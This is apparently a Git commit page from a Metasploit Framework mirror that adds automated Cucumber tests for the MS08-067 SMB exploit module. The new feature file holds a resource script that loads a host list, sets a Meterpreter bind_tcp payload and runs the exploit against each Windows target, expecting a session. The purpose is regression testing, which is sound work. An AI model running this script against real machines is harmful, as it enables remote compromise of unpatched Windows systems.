infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

working on automated testing of 08-067

bug/bundler_fix
darkbushido 2015-12-30 14:57:41 -06:00
parent be8d6df093
commit d8a7421a0a
4 changed files with 32 additions and 175 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
config/cucumber.yml
View File

@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets"
%> %>
default: <%= std_opts %> <%= ignored_tags %> features default: <%= std_opts %> <%= ignored_tags %> features
boot: <%= std_opts %> --tags @boot features boot: <%= std_opts %> --tags @boot features
exploit: <%= std_opts %> --tags @targets features
wip: --tags @wip:3 --wip features wip: --tags @wip:3 --wip features
rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip

187
features/modules/exploit/smb/ms08_067_netapi.feature
View File

@ -1,181 +1,26 @@
@wip @targets
Feature: MS08-067 netapi Feature: MS08-067 netapi
Background: Background:
Given a directory named "home" Given a directory named "home"
And I cd to "home" And I cd to "home"
And a mocked home directory And a mocked home directory
Given I run `msfconsole` interactively
And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp"
Scenario: The MS08-067 Module should have the following options Scenario: The MS08-067 should get a session with bind_tcp
When I type "use exploit/windows/smb/ms08_067_netapi" Given I ready the windows targets
And I type "show options" And a file named "ms08-067.rc" with:
And I type "exit"
Then the output should contain:
""" """
Module options (exploit/windows/smb/ms08_067_netapi): <ruby>
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
Name Current Setting Required Description self.run_single('use exploit/windows/smb/ms08_067_netapi')
---- --------------- -------- ----------- self.run_single('set payload windows/meterpreter/bind_tcp')
RHOST yes The target address hosts['windows'].each do |host|
RPORT 445 yes Set the SMB service port self.run_single("set RHOST #{host['ip']}")
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) self.run_single('run')
sleep 1
end
Exploit target:
Id Name
-- ----
0 Automatic Targeting
</ruby>
""" """
When I run `msfconsole --environment test -q -r ms08-067.rc -x exit`
Scenario: The MS08-067 Module should have the following advanced options Then the output should contain "[*] Exploit completed, 1 session was created."
When I type "use exploit/windows/smb/ms08_067_netapi"
And I type "show advanced"
And I type "exit"
Then the output should contain:
"""
Module advanced options:
Name : CHOST
Current Setting:
Description : The local client address
Name : CPORT
Current Setting:
Description : The local client port
Name : ConnectTimeout
Current Setting: 10
Description : Maximum number of seconds to establish a TCP connection
Name : ContextInformationFile
Current Setting:
Description : The information file that contains context information
Name : DCERPC::ReadTimeout
Current Setting: 10
Description : The number of seconds to wait for DCERPC responses
Name : DisablePayloadHandler
Current Setting: false
Description : Disable the handler code for the selected payload
Name : EnableContextEncoding
Current Setting: false
Description : Use transient context when encoding payloads
Name : NTLM::SendLM
Current Setting: true
Description : Always send the LANMAN response (except when NTLMv2_session is
specified)
Name : NTLM::SendNTLM
Current Setting: true
Description : Activate the 'Negotiate NTLM key' flag, indicating the use of
NTLM responses
Name : NTLM::SendSPN
Current Setting: true
Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow
authentification on windows Seven/2008r2 when SPN is required
Name : NTLM::UseLMKey
Current Setting: false
Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key
when the LM response is sent
Name : NTLM::UseNTLM2_session
Current Setting: true
Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a
NTLMv2_session
Name : NTLM::UseNTLMv2
Current Setting: true
Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key
is true
Name : Proxies
Current Setting:
Description : A proxy chain of format type:host:port[,type:host:port][...]
Name : SMB::ChunkSize
Current Setting: 500
Description : The chunk size for SMB segments, bigger values will increase
speed but break NT 4.0 and SMB signing
Name : SMB::Native_LM
Current Setting: Windows 2000 5.0
Description : The Native LM to send during authentication
Name : SMB::Native_OS
Current Setting: Windows 2000 2195
Description : The Native OS to send during authentication
Name : SMB::VerifySignature
Current Setting: false
Description : Enforces client-side verification of server response signatures
Name : SMBDirect
Current Setting: true
Description : The target port is a raw SMB service (not NetBIOS)
Name : SMBDomain
Current Setting: .
Description : The Windows domain to use for authentication
Name : SMBName
Current Setting: *SMBSERVER
Description : The NetBIOS hostname (required for port 139 connections)
Name : SMBPass
Current Setting:
Description : The password for the specified username
Name : SMBUser
Current Setting:
Description : The username to authenticate as
Name : SSL
Current Setting: false
Description : Negotiate SSL for outgoing connections
Name : SSLCipher
Current Setting:
Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
Name : SSLVerifyMode
Current Setting: PEER
Description : SSL verification method (Accepted: CLIENT_ONCE,
FAIL_IF_NO_PEER_CERT, NONE, PEER)
Name : SSLVersion
Current Setting: SSL3
Description : Specify the version of SSL that should be used (Accepted: SSL2,
SSL3, TLS1)
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
Name : WfsDelay
Current Setting: 0
Description : Additional delay when waiting for a session
"""
@targets
Scenario: Show RHOST/etc variable expansion from a config file
When I type "use exploit/windows/smb/ms08_067_netapi"
When RHOST is WINDOWS
And I type "set PAYLOAD windows/meterpreter/bind_tcp"
And I type "show options"
And I type "run"
And I type "exit"
And I type "exit"
Then the output should match /spider-wxp/

9
features/support/targets.yml.example
View File

@ -1,2 +1,7 @@
WINDOWS: spider-wxp.vuln.lax.rapid7.com windows:
LINUX: spider-ubuntu.vuln.lax.rapid7.com -
hostname: wxpsp0
ip: 127.0.0.100
-
hostname: wxpsp2
ip: 127.0.0.101

6
lib/tasks/custom_cucumber.rake
View File

@ -12,6 +12,12 @@ begin
t.fork = true # You may get faster startup if you set this to false t.fork = true # You may get faster startup if you set this to false
t.profile = 'boot' t.profile = 'boot'
end end
Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t|
t.binary = vendored_cucumber_bin # If nil, the gem's binary is used.
t.fork = true # You may get faster startup if you set this to false
t.profile = 'exploit'
end
end end
rescue LoadError rescue LoadError